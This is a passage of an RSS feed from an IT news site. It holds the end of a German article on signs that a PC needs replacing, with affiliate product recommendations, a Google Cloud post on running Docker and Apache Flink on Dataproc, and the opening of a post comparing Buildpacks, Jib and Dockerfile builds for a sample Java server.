<p>Wenn die SSD ständig überläuft, wird das Arbeiten am PC schnell zur Geduldsprobe. Windows warnt dann permanent vor zu wenig Speicher, Programme lassen sich nicht mehr installieren und selbst einfache Updates schlagen fehl. Zwar kann man kurzfristig <a href="https://www.pcwelt.de/article/2618442/die-besten-externen-portablen-ssds-test.html" target="_blank" rel="noreferrer noopener">mit einer externen Festplatte</a> oder <a href="https://www.pcwelt.de/article/1152317/speicherplatz-in-der-cloud-optimal-ausreizen.html" target="_blank" rel="noreferrer noopener">Cloud-Speicher</a> aushelfen. Auf Dauer wird es aber mühsam, ständig Daten hin- und herzuschieben.</p>



<p><strong>Tipp:</strong> Schauen Sie im Explorer nach, wie viel freier Speicher auf Ihrer System-SSD (meist „C:“) noch übrig ist. Ist die permanent voll und lässt sich nicht sinnvoll auf- oder nachrüsten,, ist ein neuer PC die bessere Lösung.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 4: Alles läuft nur noch im Schneckentempo</h2>



<p>Ihr Rechner benötigt Minuten zum Hochfahren, Programme starten träge, und selbst einfache Aufgaben wie das Öffnen eines Browser-Tabs fühlen sich zäh an? Dann ist die Hardware schlicht zu alt oder ausgelastet. Eine <a href="https://www.pcwelt.de/article/1195856/beste-ssds.html" target="_blank" rel="noreferrer noopener">SSD</a> oder mehr <a href="https://www.pcwelt.de/article/1090983/ratgeber-pc-ram-aufruesten-schnell-und-guenstig-wie-nie.html" target="_blank" rel="noreferrer noopener">RAM</a> können dann kurzfristig helfen – sofern Sie die horrenden Preise für Arbeitsspeicher und Laufwerke bezahlen wollen oder können. Oftmals ist es dann günstiger, sich gleich einen neuen PC zu kaufen.</p>



<p><strong>Tipp:</strong> Achten Sie darauf, wie lange Ihr PC für Alltagsaufgaben braucht. Wenn sich Wartezeiten häufen und neue Software ständig ruckelt oder abstürzt, ist es an der Zeit, über ein Upgrade nachzudenken. Dann laufen Programme nicht nur schnell und geschmeidig, die Nutzung macht mit einem responsiven System auch deutlich mehr Spaß.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 5: Upgrade nicht möglich oder nicht mehr sinnvoll</h2>



<p>Ein klares Zeichen für den fälligen PC-Wechsel ist auch, wenn sich der Rechner nicht mehr sinnvoll erweitern lässt. Alte Mainboards unterstützen oft keine aktuellen Prozessoren oder RAM-Standards, und in kleinen Fertigsystemen ist schlicht kein Platz für eine neue <a href="https://www.pcwelt.de/article/3127541/beste-grafikkarten-fuer-gamer.html" target="_blank" rel="noreferrer noopener">Grafikkarten</a> – oder das Netzteil ist zu schwach dafür. </p>



<p>Hinzu kommen veraltete Schnittstellen wie USB und PCI Express, die ebenfalls Ihren PC per se ausbremsen. Wer hier noch versucht, nachzurüsten, steckt oft viel Geld in eine alte Plattform, ohne große Leistungsverbesserung.</p>



<p><strong>Tipp:</strong> Prüfen Sie vor einem Hardware-Upgrade, ob Ihr System moderne Standards wie DDR5-RAM, PCIe 4.0 oder USB4 unterstützt. Ist das nicht der Fall, lohnt sich in vielen Fällen der Umstieg auf ein komplett neues Gerät.</p>



<h2 class="wp-block-heading toc">3 Kauftipps: Der passende PC für Office, Multimedia und Gaming</h2>



<p>Hier stellen wir Ihnen drei vorkonfigurierte PCs vor, die mit starkem Preis-Leistungs-Verhältnis punkten. Eine größere Auswahl bietet unser Beitrag “<a href="https://www.pcwelt.de/article/3003041/die-besten-mini-pcs-im-test-fur-buro-streaming-gaming-und-server.html" target="_blank" rel="noreferrer noopener">Die besten Mini-PCs im Test</a>“. </p>



<p>Preisbewusste Käufer sollten sich zusätzlich unseren Artikel “<a href="https://www.pcwelt.de/article/3143670/die-besten-mini-pcs-bis-800-euro-test.html" target="_blank" rel="noreferrer noopener">Die besten Mini-PCs bis 800 Euro im Test</a>” anschauen. Damit sparen Sie sich langes Suchen und Vergleichen. Sie können direkt ein Modell wählen, das zu Ihren Ansprüchen passt. Fürs Office, Multimedia und Gaming haben wir für Sie noch drei Empfehlungen mit dem aktuell besten Preis-Leistungs-Verhältnis herausgepickt:</p>



<h3 class="wp-block-heading">Office-Empfehlung: Peladn WO4</h3>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a532fa96a4ee"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Test-PELADN-WO4.png" alt="Test PELADN WO4" class="wp-image-3033667" width="1024" height="576" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



		<div class="promo_wrap promo_wrap_sticky">
			<div class="row_wrapper">
				<div class="column_wrapper">
					<p class="eyebrow">Empfehlung Office-PC</p>
					<p class="promo-title"><strong>Mini-PC Peladn WO4 (AMD Ryzen 5 7640HS, 16 GB RAM)</strong></p>
					<p class="promo-description">ab 520 Euro</p>
				</div>
				<div class="more_btn"><a href="https://www.amazon.de/dp/B0GLN637YM?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" class="sticky-promotion-view-deal-link" data-vars-link-position="Floating Conversion Unit">Erfahren Sie mehr</a></div>
			</div>
		</div>
		


<p>Der Peladn WO4 (<a href="https://www.pcwelt.de/article/3033663/peladn-wo4-im-test.html" target="_blank" rel="noreferrer noopener">Test</a>) zeigt eindrucksvoll, wie viel durchdachte Technik heute in ein ultrakompaktes Gehäuse passt. Herzstück ist der AMD Ryzen 5 7640HS, der mit moderner Zen-4-Architektur, hoher Effizienz und starker Single-Core-Leistung selbst anspruchsvolle Aufgaben mühelos bewältigt. In Kombination mit 16 GB DDR5-RAM und der integrierten Radeon-760M-Grafik eignet sich der Mini-PC nicht nur als Office-Rechner mit hoher Produktivität, sondern bewältigt auch Multitasking-Aufgaben und KI-Workflows.</p>



<h3 class="wp-block-heading">Multimedia-Empfehlung: Geekom A9 Max 2026 Edition</h3>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a532fa96b021"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Test-Geekom-A9-Max-2026.png" alt="Test Geekom A9 Max 2026" class="wp-image-3134101" width="1024" height="576" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



		<div class="promo_wrap promo_wrap_sticky">
			<div class="row_wrapper">
				<div class="column_wrapper">
					<p class="eyebrow">Empfehlung Multimedia-PC</p>
					<p class="promo-title"><strong>Geekom A9 Max 2026 Edition (Ryzen 9 7940HS, Radeon 780M)</strong></p>
					<p class="promo-description">ab 769 Euro</p>
				</div>
				<div class="more_btn"><a href="https://www.amazon.de/dp/B0G2BZGX1N?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" class="sticky-promotion-view-deal-link" data-vars-link-position="Floating Conversion Unit">Erfahren Sie mehr</a></div>
			</div>
		</div>
		


<p>Mit dem A9 Max 2026 Edition (<a href="https://www.pcwelt.de/article/3134099/geekom-a9-max-2026-test.html" target="_blank" rel="noreferrer noopener">Test</a>) liefert Geekom ein moderates, aber sinnvolles Update. Mit leistungsstarken AMD-Prozessoren vom Ryzen 9 7940HS bis zum Ryzen AI 9 HX 470 erreicht der Mini-PC bei Bildbearbeitung und Videoschnitt ein sehr hohes Leistungsniveau. Die Anschlussvielfalt bleibt stark, die dreijährige Garantie spricht für Geekom. Käufer erhalten ein insgesamt ausgewogenes Multimedia-Paket für die kommenden Jahre.</p>



<h3 class="wp-block-heading">Gaming-Empfehlung: Cyberpowerpc Luxe Gaming-PC</h3>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a532fa96bc6f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/CYBERPOWERPC-Luxe-Gaming-PC-Titel.jpg?quality=50&amp;strip=all&amp;w=1200" alt="CYBERPOWERPC Luxe Gaming-PC - AMD Ryzen 7 9800X3D, Nvidia RTX 5070 Ti 16GB" class="wp-image-3166857" width="1200" height="900" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">CYBERPOWERPC </p></div>



		<div class="promo_wrap promo_wrap_sticky">
			<div class="row_wrapper">
				<div class="column_wrapper">
					<p class="eyebrow">Empfehlung Gaming-PC</p>
					<p class="promo-title"><strong>Cyberpowerpc Luxe Gaming-PC (5070 Ti, 9800X3D, 32 GB RAM)</strong></p>
					<p class="promo-description">2.239 Euro</p>
				</div>
				<div class="more_btn"><a href="https://www.amazon.de/dp/B0DZJ16C8L?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" class="sticky-promotion-view-deal-link" data-vars-link-position="Floating Conversion Unit">Erfahren Sie mehr</a></div>
			</div>
		</div>
		


<p>Bis hin zur 4K-Auflösung sind Sie mit dem Cyberpowerpc Luxe gut fürs Gaming aufgestellt. Die Nvidia Geforce RTX 5070 Ti bringt 16 GB GDDR7-Videospeicher und modernste Bildverbesserungstechniken wie DLSS 4.5 mit. Zur Seite gestellt ist die Grafikkarte der Achtkern-Prozessor <a href="https://www.pcwelt.de/article/1165008/der-ideale-gaming-prozessor-tipps-zum-cpu-kauf.html" target="_blank" rel="noreferrer noopener">AMD Ryzen 7 9800X3D</a> mit dem Gaming-Turbo 3D V-Cache. </p>



<p>Dazu gibt’s satte 32 GB Arbeitsspeicher und eine 1 TB große SSD. Der Rechner setzt auf eine AIO-Wasserkühlung und sorgt mit sechs RGB-Lüftern auch für eine stimmige Beleuchtung.</p>



<h2 class="wp-block-heading toc">Fazit: Wann ein neuer PC wirklich Sinn ergibt</h2>



<p>Fehlende Updates, volle Festplatten, träge Leistung, Überhitzung oder mangelnde Aufrüstbarkeit: Das sind klare Signale, dass Ihr PC ausgedient hat. Ein neues System lohnt sich aber nicht nur bei Problemen. Auch um die Produktivität zu verbessern oder um Multimedia und Gaming mit modernen Standards zu genießen, ist geeignete Hardware wichtig – und sie verspricht mehr Spaß bei der täglichen Nutzung.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Dataproc optional components support Apache Flink and Docker]]></title>
<description><![CDATA[Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.Docker container on DataprocDocke...]]></description>
<link>https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.</p><h3>Docker container on Dataproc</h3><p>Docker is a widely used container technology. Since it’s now a Dataproc optional component, Docker daemons can now be installed on every node of the Dataproc cluster. This will give you the ability to install containerized applications and interact with Hadoop clusters easily on the cluster. </p><p>In addition, Docker is also critical to supporting these features:</p><ol><li><p>Running containers with YARN</p></li><li><p>Portable Apache Beam job</p></li></ol><p>Running containers on YARN allows you to manage dependencies of your YARN application separately, and also allows you to create containerized services on YARN. <a href="https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/DockerContainers.html" target="_blank">Get more details here.</a> Portable Apache Beam packages jobs into Docker containers and submits them the Flink cluster. Find <a href="https://beam.apache.org/roadmap/portability/" target="_blank">more detail about Beam portability</a>. </p><p>Docker optional component is also configured to use <a href="https://cloud.google.com/container-registry">Google Container Registry</a>, in addition to the default Docker registry. This lets you use container images managed by your organization.</p><p>Here is how to create a Dataproc cluster with the Docker optional component:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=DOCKER \</code><br><code>  --image-version=1.5</code></p><p>When you run the Docker application, the log will be streamed to Cloud Logging, using gcplogs driver.</p><p>If your application does not depend on any Hadoop services, check out <a href="https://kubernetes.io/" target="_blank">Kubernetes</a> and <a href="https://cloud.google.com/kubernetes-engine/docs/quickstart">Google Kubernetes Engine</a> to run containers natively. For more on using Dataproc, <a href="https://cloud.google.com/dataproc/docs">check out our documentation</a>.</p><h3>Apache Flink on Dataproc</h3><p>Among streaming analytics technologies, Apache Beam and Apache Flink stand out. Apache Flink is a distributed processing engine using stateful computation. <a href="https://beam.apache.org/get-started/beam-overview/" target="_blank">Apache Beam</a> is a unified model for defining batch and steaming processing pipelines. Using <a href="https://beam.apache.org/documentation/runners/flink/" target="_blank">Apache Flink as an execution engine</a>, you can also run Apache Beam jobs on Dataproc, in addition to Google’s Cloud Dataflow service.</p><p>Flink and running Beam on Flink are suitable for large-scale, continuous jobs, and provide:</p><ul><li><p>A streaming-first runtime that supports both batch processing and data streaming programs</p></li><li><p>A runtime that supports very high throughput and low event latency at the same time</p></li><li><p>Fault-tolerance with exactly-once processing guarantees</p></li><li><p>Natural back-pressure in streaming programs</p></li><li><p>Custom memory management for efficient and robust switching between in-memory and out-of-core data processing algorithms</p></li><li><p>Integration with YARN and other components of the Apache Hadoop ecosystem</p></li></ul><p>Our Dataproc team here at Google Cloud recently announced that <a href="https://cloud.google.com/blog/products/data-analytics/open-source-processing-engines-for-kubernetes">Flink Operator on Kubernetes</a> is now available. It allows you to run Apache Flink jobs in Kubernetes, bringing the benefits of reducing platform dependency and producing better hardware efficiency. </p><p><b>Basic Flink Concepts</b></p><p>A Flink cluster consists of a Flink JobManager and a set of Flink TaskManagers. Like similar roles in other distributed systems such as YARN, JobManager has responsibilities such as accepting jobs, managing resources and supervising jobs. TaskManagers are responsible for running the actual tasks. </p><p>When running Flink on Dataproc, we use YARN as resource manager for Flink. You can run Flink jobs in 2 ways: job cluster and session cluster. For the job cluster, YARN will create JobManager and TaskManagers for the job and will destroy the cluster once the job is finished. For session clusters, YARN will create JobManager and a few TaskManagers.The cluster can serve multiple jobs until being shut down by the user.</p><p><b>How to create a cluster with Flink</b></p><p>Use this command to get started:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=FLINK \</code><br><code>  --image-version=1.5</code></p><p><b>How to run a Flink job</b></p><p>After a Dataproc cluster with Flink starts, you can submit your Flink jobs to YARN directly using the Flink job cluster. After accepting the job, Flink will start a JobManager and slots for this job in YARN. The Flink job will be run in the YARN cluster until finished. The JobManager created will then be shut down. Job logs will be available in regular YARN logs. Try this command to run a word-counting example:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m yarn-cluster /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8374c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>The Dataproc cluster will not start a <a href="https://ci.apache.org/projects/flink/flink-docs-release-1.10/ops/deployment/yarn_setup.html#flink-yarn-session" target="_blank">Flink Session</a> cluster by default. Instead, Dataproc will create the script “/usr/bin/flink-yarn-daemon,” which will start a Flink session. </p><p>If you want to start a Flink session when Dataproc is created, use the metadata key to allow it:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK \\ \r\n    --image-version=1.5 \\\r\n    --metadata flink-start-yarn-session=true'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837580&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to start the Flink session after Dataproc is created, you can run the following command on master node:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ . /usr/bin/flink-yarn-daemon'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8375e0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Submit jobs to that session cluster. You’ll need to get the Flink JobManager URL:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m &lt;JOB_MANAGER_HOSTNAME&gt;:&lt;REST_API_PORT&gt; /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837640&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Java Beam job</b></p><p>It is very easy to run an Apache Beam job written in Java. There is no extra configuration needed. As long as you package your Beam jobs into a JAR file, you do not need to configure anything to run Beam on Flink. This is the command you can use:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ mvn package -Pflink-runner\r\n$ bin/flink run -c org.apache.beam.examples.WordCount /path/to/your.jar\r\n--runner=FlinkRunner --other-parameters'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8376a0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Python Beam job written in Python</b></p><p>Beam jobs written in Python use a different execution model. To run them in Flink on Dataproc, you will also need to enable the Docker optional component. Here’s how to create a cluster:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK,DOCKER'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837700&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will also need to install necessary Python libraries needed by Beam, such as apache_beam and apache_beam[gcp]. You can pass in a Flink master URL to let it run in a session cluster. If you leave the URL out, you need to use the job cluster mode to run this job:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'import apache_beam as beam\r\nfrom apache_beam.options.pipeline_options import PipelineOptions\r\n\r\noptions = PipelineOptions([\r\n    "--runner=FlinkRunner",\r\n    "--flink_version=1.9",\r\n    "--flink_master=localhost:8081",\r\n    "--environment_type=DOCKER"\r\n])\r\nwith beam.Pipeline(options=options) as p:\r\n    ...'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837760&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>After you’ve written your Python job, simply run it to submit:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ python wordcount.py'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8377c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><a href="https://cloud.google.com/dataproc">Learn more about Dataproc.</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Buildpacks vs Jib vs Dockerfile: Comparing containerization methods]]></title>
<description><![CDATA[As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of ...]]></description>
<link>https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of the compiled Java classes and would run inside of a "container" running on the JVM. As long as your class files were compatible with the JVM and container, the app would just work.</p><p>That all worked great until people started building non-JVM stuff: Ruby, Python, NodeJS, Go, etc. Now we needed another way to package up apps so they could be run on production systems. To do this we needed some kind of virtualization layer that would allow anything to be run. Heroku was one of the first to tackle this and they used a Linux virtualization system called "lxc" - short for Linux Containers. Running a "container" on lxc was half of the puzzle because still a "container" needed to be created from source code, so Heroku invented what they called "Buildpacks" to create a standard way to convert source into a container.</p><p>A bit later a Heroku competitor named dotCloud was trying to tackle similar problems and went a different route which ultimately led to Docker, a standard way to create and run containers across platforms including Windows, Mac, Linux, Kubernetes, and Google Cloud Run. Ultimately the container specification behind Docker became a standard under the <a href="https://opencontainers.org/" target="_blank">Open Container Initiative (OCI)</a> and the virtualization layer switched from lxc to <a href="https://github.com/opencontainers/runc" target="_blank">runc</a> (also an OCI project).</p><p>The traditional way to build a Docker container is built into the <code>docker</code> tool and uses a sequence of special instructions usually in a file named <code>Dockerfile</code> to compile the source code and assemble the "layers" of a container image.</p><p>Yeah, this is confusing because we have all sorts of different "containers" and ways to run stuff in those containers. And there are also many ways to create the things that run in containers. The bit of history is important because it helps us categorize all of this into three parts:</p><ul><li>Container Builders - Turn source code into a Container Image</li><li>Container Images - Archive files containing a "runnable" application</li><li>Containers - Run Container Images</li></ul><p>With Java EE those three categories map to technologies like:</p><ul><li>Container Builders == Ant or Maven</li><li>Container Images == .jar, .war, or .ear</li><li>Containers == JBoss, WebSphere, WebLogic</li></ul><p>With Docker / OCI those three categories map to technologies like:</p><ul><li>Container Builders == Dockerfile, Buildpacks, or Jib</li><li>Container Images == .tar files usually not dealt with directly but through a "container registry"</li><li>Containers == Docker, Kubernetes, Cloud Run</li></ul><h3>Java Sample Application</h3>Let's explore the Container Builder options further on a little Java server application.  If you want to follow along, clone my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a>:<p><code>git clone https://github.com/jamesward/comparing-docker-methods.git</code><br></p><p><code>cd comparing-docker-methods</code></p><p></p><p>In that project you'll see a basic Java web server in <code>src/main/java/com/google/WebApp.java</code> that just responds with "hello, world" on a GET request to <code>/</code>. Here is the source:<br></p><p></p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'package com.google;\r\n\r\nimport com.sun.net.httpserver.HttpServer;\r\nimport java.io.IOException;\r\nimport java.io.OutputStream;\r\nimport java.net.InetSocketAddress;\r\n\r\npublic class WebApp {\r\n\r\n  public static void main(String[] args) throws IOException {\r\n    int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));\r\n    HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);\r\n\r\n    server.createContext("/", handler -&gt; {\r\n      byte[] response = "hello, world".getBytes();\r\n      handler.sendResponseHeaders(200, response.length);\r\n      try (OutputStream os = handler.getResponseBody()) {\r\n        os.write(response);\r\n      }\r\n    });\r\n\r\n    System.out.println("Listening at http://localhost:" + port);\r\n\r\n    server.start();\r\n  }\r\n}'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860670&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>This project uses Maven with a minimal <code>pom.xml</code> build config file for compiling and running the Java server:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;?xml version="1.0" encoding="UTF-8"?&gt;\r\n&lt;project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\r\n    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"&gt;\r\n  &lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;\r\n\r\n  &lt;groupId&gt;com.google&lt;/groupId&gt;\r\n  &lt;artifactId&gt;sample-java-mvn&lt;/artifactId&gt;\r\n  &lt;packaging&gt;jar&lt;/packaging&gt;\r\n  &lt;version&gt;0.1.0-SNAPSHOT&lt;/version&gt;\r\n\r\n  &lt;properties&gt;\r\n    &lt;maven.compiler.source&gt;8&lt;/maven.compiler.source&gt;\r\n    &lt;maven.compiler.target&gt;8&lt;/maven.compiler.target&gt;\r\n  &lt;/properties&gt;\r\n\r\n  &lt;build&gt;\r\n    &lt;plugins&gt;\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.codehaus.mojo&lt;/groupId&gt;\r\n        &lt;artifactId&gt;exec-maven-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;1.6.0&lt;/version&gt;\r\n        &lt;executions&gt;\r\n          &lt;execution&gt;\r\n            &lt;goals&gt;\r\n              &lt;goal&gt;java&lt;/goal&gt;\r\n            &lt;/goals&gt;\r\n          &lt;/execution&gt;\r\n        &lt;/executions&gt;\r\n        &lt;configuration&gt;\r\n          &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;\r\n        &lt;artifactId&gt;maven-jar-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;3.2.0&lt;/version&gt;\r\n        &lt;configuration&gt;\r\n          &lt;archive&gt;\r\n            &lt;manifest&gt;\r\n              &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n            &lt;/manifest&gt;\r\n          &lt;/archive&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n    &lt;/plugins&gt;\r\n  &lt;/build&gt;\r\n\r\n&lt;/project&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860c10&gt;)])]&gt;</dd>
</dl></div>
